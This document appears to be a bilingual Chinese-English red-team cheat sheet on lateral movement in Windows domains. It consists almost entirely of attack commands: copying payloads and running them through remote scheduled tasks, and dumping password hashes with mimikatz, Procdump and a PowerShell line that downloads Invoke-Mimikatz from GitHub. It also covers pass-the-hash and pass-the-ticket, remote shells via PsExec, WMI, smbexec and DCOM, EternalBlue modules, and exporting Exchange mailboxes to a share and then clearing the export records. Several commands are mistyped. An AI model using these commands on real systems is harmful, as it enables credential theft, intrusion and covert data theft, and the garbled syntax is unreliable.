域内横向移动分析

常用 Windows 远程连接和相关命令

IPC

1

net use \\IP\ipc$ 'password' /user:Administrator

IPC 的利用条件

Open Port 139

The administrator has enabled the default sharing

使用 Windows 自带的工具获取远程主机信息

dir 命令

1

dir \\IP\c$

tasklist 命令

1

tasklist /S IP /U administrator /P password

计划任务

at 命令

Mainly in Windows server before 2008 version

查看目标系统时间

1

net time \\IP

将 payload 复制到目标系统中

1

copy payload.bat \\IP\C$

使用 at 命令创建计划任务

1

at \\IP 8:00AM C:\payload.bat

Return a scheduled task ID

清除 at 记录

1

at \\IP taskID /delete

Use at to save the execution result to the remote and read the result:

1

at \\IP 8:00AM cmd.exe /c 'ipconfig C:/1.txt'

1

type \\IP\C$\1.txt

schtask 命令

建立 IPC 连接

创建名为 task 的计划任务

1

schtask /create /s IP /tn test /sc onstart /tr c:\payload.bat /ru system /f

执行该计划任务

1

schtask /run /s IP /i /tn 'test'

删除计划任务

1

schtask /delete /s IP /tn 'test' /f

Windows 系统散列值获取

单机密码抓取

GetPass

1

GetPassword_x64.exe

PwDump7

1

PwDump7.exe

通过 SAM 和 SYSTEM 文件抓取密码

导出 SAM 和 System 文件

1

2

reg save hklm\sam sam.hive

reg save hklm\system system.hive

通过读取 SAM 和 System 文件获得 NTLM Hash

mimikatz

1

lsadump:sam /sam:sam.hive system:system.hive

cain

The target machine uses mimikatz to directly read local SAM files

1

2

privilege:debug

lsadump:sam

使用 mimikatz 在线读取 SAM 文件

1

mimikatz.exe 'privilege:debug' 'log' 'sekurlsa:loginpasswords'

使用 mimikatz 离线读取 lass.dmp 文件

导出 lass.dmp 文件

Export lsass.dmp file using Task Manager

The task manager finds the lsass.exe process, right-click, and select the "Create Dump File" option.

Export lsass.dmp file using Procdump

Microsoft officially released tools, free of killing

1

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

使用 mimikatz 导出 lsass.dmp 文件中的密码值

1

2

sekurlsa:mimidump lsass.dmp

sekurlsa:logonpasswords full

使用 Powershell 对散列值进行 Dump 操作

1

Import-Module .\Get-PassHashes.ps1

使用 Powershell 远程加载 mimikatz 抓取散列值和明文密码

1

powershell 'IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PwoerSploit/master/Exfilration/Invoke-Mimikatz.ps1');Invoke-Mimikatz'

哈希传递攻击

使用 NTLM Hash 进行哈希传递

1

mimikatz 'privilege:debug' 'sekurlsa:pth /user:administrator /domain:pentest.hacker /ntlm:[NTLM]'

使用 AES-256 密钥进行哈希传递

Crawl AES-256 Key with mimikatz

1

mimikatz 'privilege:debug' 'sekurlsa:ekeys'

pth attack (the target machine must be installed KB2871997)

1

mimikatz 'privilege:debug' 'sekurlsa:pth /user:administrator /domain:pentest.hacker /aes256:[aes256]'

票据传递

使用 mimikatz 进行票据传递

导出票据

1

mimikatz 'privilege:debug' 'sekurlsa:tickets /exports'

注入票据

1

mimikatz 'kerberos:ptt' 'C:\xxx.kirbi'

使用 kekeo 进行票据传递

生成票据文件

1

kekeo 'tgt:ask /user:administrator /domain:pentest.hack /ntlm:[NTLM]'

将票据文件导入内存

1

kekeo 'kerberos:ptt xxx.kirbi'

PsExec 的使用

PsTools 工具中的 PsExec

建立 IPC 连接

1

net use \\IP\ipc$ 'password' /u:administrator

获取 System 权限的 交互式shell

1

2

3

PsExec.exe -accepteula \\IP -s cmd.exe

or

PsExec.exe -accepteula \\IP -s cmd.exe /c ipconfig

If the -s command is not used, create a shell with Administrator permissions

If no IPC connection is established:

1

PsExec.exe -accepteula \\IP -u administrator -p password -s cmd.exe

Metasploit 中的 psexec 模块

exploit/windows/smb/psexec

exploit/windows/smb/psexec_psh (powershell version)

WMI 的使用

基本命令

1

wmic /node:IP /user:administrator /password:passed process call create 'cmd.exe /c ipconfig ip.txt'

After establishing an IPC connection, use the type command to read the result:

1

type \\IP\C$\ip.txt

impacket 包中的 wmiexec

1

wmiexec.py administrator:password@IP

wmiexec.vbs

Semi-interactive shell

1

cscript.exe //nologo wmiexec.vbs /shell IP administrator password

Execute a single command

1

cscript.exe wmiexec.vbs /cmd IP administrator password 'ipconfig'

For commands with longer run times, such as ping and systeminfo, the -wait 5000 command or longer wait time is required. When running nc, etc. which does not require output orders, you need to wait for running, the -persist parameter is required.

Invoke-WmiCommand

in powersploit toolkit

Import Invoke-Wmicommand.ps1 into the system

1

2

3

4

5

6

7

8

9

$User='pentest.hacker\administrator'

$Password=ConvertTo-SecureString -String 'password' -AsPlainText -Force

$Cred=New-Object -TypeName System.Management.AutoMation.PSCredential -ArgumentList $User, $Password

$Remote=Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName IP

$Remore.PayloadOutput

Invoke-WMIMethod

Use the Invoke-WMIMethod that comes with powershell, which is non-interactive and has no echo.

1

2

3

4

5

6

7

$User='pentest.hacker\administrator'

$Password=ConvertTo-SecureString -String 'password' -AsPlainText -Force

$Cred=New-Object -TypeName System.Management.AutoMation.PSCredential -ArgumentList $User, $Password

$Remote=Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList 'calc.exe' -Credential $Cred -ComputerName IP

永恒之蓝漏洞

auxiliary/scanner/smb/smb_ms17_010

exploit/windows/smb/ms17_010_eternalblue

smbexec

C++ 版本 smbexec

Upload execserver.exe to the C:\Windows\ directory of the target system, and lift UAC's restrictions on commands.

1

2

net use \\IP 'password' /user:pentest\administrator

test.exe IP administrator password whoami c$

impacket 工具包中的 smbexec.py

1

smbexec.py penteer/administrator:password\@IP

DCOM 在远程系统中的使用

通过本地 DCOM 执行命令

获取 DCOM 程序列表

windows server 2012 and above

1

Get-CimInstance Win32_DCOMApplicatioon

Windows 7, Windows Server 2008

1

Get-WmicObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

使用 DCOM 执行任意命令

Locally start a powershell with administrator privileges

1

[System.Activator]:CreateInstance([type]:GetTypeFromProgID('MMC20.Application','127.0.0.1')).Document.ActiveView.ExecuteShellCommand('cmd.exe','0','/c calc.exe','Minimzed')

使用 DCOM 在远程机器上执行命令

You must use an account with local administrator privileges when connecting remotely

使用 IPC$ 连接远程计算机

1

net use \\IP 'password' /user:pentest.hacker\win7user

执行命令

调用 MMC20_Application 远程执行命令

1

2

$com=[Activator]:CreateInstance([type]:GetTypeFromProgID('MMC20.Application','IP'))

$com.Document.ActiveView.ExecuteShellCommand('cmd.exe','0','/c calc.exe','Minimzed')

调用 9BA05972-F6A8-11CF-A442-00A0C90A8F39

1

2

3

4

$com=[Type]:GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39','IP')

$obj=[System.Activator]:CreateInstance($com)

$item=$obj.item()

$item.Document.Application.ShellExecute('cmd.exe','/c calc.exe','c:\windows\system32','$null',0)

SPN 在域环境中的使用

SPN 扫描

PowerShell-AD-Recon

利用 SPN 发现域中所有的 MSSQL 服务

1

2

Import-Module .\Discover-PSMSSQLServer.ps1

Discover-PSMSSQLServers

扫描域中所有的 SPN 信息

1

2

Import-Module .\Discover-PSInterestingServices.ps1

Discover-PSInterestingServices

Without using third-party Powershell scripts, enter the following command to query all SPN information

1

setspn -T domain -q */*

Exchange 邮件服务器攻击

Exchange 服务发现

基于端口扫描发现

1

nmap -A -O -sV IP

SPN 查询

1

setspn -T pentest.hacker -F -Q */*

Exchange 的基本操作

查看邮件数据库

1

2

add-pssnapin microsoft.exchange*

Get-MailboxDatabase -server 'Exchange1'

Specify the database and query it for details

1

Get-MailboxDatabase -Identify 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath

获取现有用户的邮件地址

1

Get-Mailbox | format-tables Name, WindowsEmailAddress

查看指定用户的邮箱使用信息

1

Get-Mailboxstatistics -identify administrator | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime

获取用户邮箱中的邮件数量

1

Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Sort-Object TotalItemSize -Decend

导出指定的电子邮件

配置用户的导入、导出权限

查看用户权限

1

Get-ManagementRoleAssignment -role 'Mailbox Import Export' | Format-List RoleAssigneeName

添加权限

1

New-ManagementRoleAssignment -Name 'Import Export_Domain Admins' -User 'Administrator' -Role 'Mailbox Import Export'

删除权限

1

New-ManagementRoleAssignment 'Import Export_Domain Admins' -Confirm:$false

设置网络共享文件夹

1

net share inetpub=c:\inetpub /grant:everyone,full

导出用户的电子邮件

1

New-MailboxExportRequest -Mailbox administrator -FilePath \\IP\inetpub\administrator.pst

管理导出请求

View previous export records

1

Get-MailboxExportRequest

Delete the specified user's completed export request

1

Remove-MailboxExportRequest -Identify Administrator\mailboxexport

Delete all requests that have been exported

1

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest